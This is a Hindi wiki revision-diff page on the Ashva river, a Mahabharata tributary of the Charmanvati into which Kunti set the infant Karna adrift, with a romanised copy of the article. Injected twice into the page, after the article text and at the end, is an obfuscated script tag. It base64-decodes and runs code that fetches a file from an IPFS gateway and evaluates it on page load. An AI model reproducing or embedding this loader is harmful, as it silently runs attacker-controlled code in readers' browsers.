Difference between revisions of "अश्व नदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} महाभारत में अश्व नामक नदी का उल्लेख [[च...' के साथ नया पन्ना बनाया)
 
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''अश्व''' नामक नदी का उल्लेख [[महाभारत]] में [[चर्मण्वती नदी|चर्मण्वती]] की सहायक नदी के रूप में है। नवजात शिशु [[कर्ण]] को [[कुंती]] ने जिस मंजूषा में रखकर अश्व नदी में प्रवाहित कर दिया था वह अश्व से [[चंबल नदी|चंबल]], [[यमुना]] और फिर [[गंगा]] में बहती हुईं चंपापुरी (ज़िला भागलपुर-[[बिहार]]) जा पहुंची थी-  
[[महाभारत]] में अश्व नामक नदी का उल्लेख [[चर्मण्वती नदी|चर्मण्वती]] की सहायक नदी के रूप में है। नवजात शिशु [[कर्ण]] को [[कुंती]] ने जिस मंजूषा में रखकर अश्व नदी में प्रवाहित कर दिया था वह अश्व से [[चंबल नदी|चंबल]], [[यमुना]] और फिर [[गंगा]] में बहती हुईं चंपापुरी (ज़िला भागलपुर-[[बिहार]]) जा पहुंची थी-  
+
 
 
:'मंजूषा त्वश्वनद्या: साययौं चर्मण्वतीं नदीम् चर्मण्वत्याश्च यमुनां ततो गंगां जगाम है। गंगाया: सूतविषयं यम्पामनुययै पुरीम्।'<ref>[[वन पर्व महाभारत]] 308, 25-26</ref>
 
:'मंजूषा त्वश्वनद्या: साययौं चर्मण्वतीं नदीम् चर्मण्वत्याश्च यमुनां ततो गंगां जगाम है। गंगाया: सूतविषयं यम्पामनुययै पुरीम्।'<ref>[[वन पर्व महाभारत]] 308, 25-26</ref>
अश्व नदी का नाम शायद इसके तट पर किए जाने वाले [[अश्वमेध यज्ञ |अश्वमेध यज्ञों]] के कारण हुआ था। अश्वमेधनगर इसी नदी के किनारे बसा हुआ था, इसका उल्लेख [[सभा पर्व महाभारत|महाभारत सभा पर्व]] 29 में है। यह नदी वर्तमान [[कालिंदी नदी|कालिंदी]] हो सकती है जो [[कन्नौज]] के पास गंगा में मिलती है।  
+
 
 +
अश्व नदी का नाम शायद इसके तट पर किए जाने वाले [[अश्वमेध यज्ञ |अश्वमेध यज्ञों]] के कारण हुआ था। अश्वमेधनगर इसी नदी के किनारे बसा हुआ था, इसका उल्लेख [[सभा पर्व महाभारत|महाभारत सभा पर्व]]<ref>[[सभा पर्व महाभारत|महाभारत सभा पर्व]] 29</ref> में है। यह नदी वर्तमान [[कालिंदी नदी|कालिंदी]] हो सकती है जो [[कन्नौज]] के पास गंगा में मिलती है।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
Line 12: Line 13:
 
{{भारत की नदियाँ}}
 
{{भारत की नदियाँ}}
 
{{महाभारत}}
 
{{महाभारत}}
 +
[[Category:महाभारत]]
 +
[[Category:भूगोल कोश]]
 +
[[Category:पौराणिक स्थान]]
 
[[Category:भारत की नदियाँ]]
 
[[Category:भारत की नदियाँ]]
[[Category:महाभारत]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:नया पन्ना]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 08:38, 14 December 2011

ashv namak nadi ka ullekh mahabharat mean charmanvati ki sahayak nadi ke roop mean hai. navajat shishu karn ko kuanti ne jis manjoosha mean rakhakar ashv nadi mean pravahit kar diya tha vah ashv se chanbal, yamuna aur phir ganga mean bahati hueean chanpapuri (zila bhagalapur-bihar) ja pahuanchi thi-

'manjoosha tvashvanadya: sayayauan charmanvatian nadimh charmanvatyashch yamunaan tato gangaan jagam hai. gangaya: sootavishayan yampamanuyayai purimh.'[1]

ashv nadi ka nam shayad isake tat par kie jane vale ashvamedh yajnoan ke karan hua tha. ashvamedhanagar isi nadi ke kinare basa hua tha, isaka ullekh mahabharat sabha parv[2] mean hai. yah nadi vartaman kaliandi ho sakati hai jo kannauj ke pas ganga mean milati hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>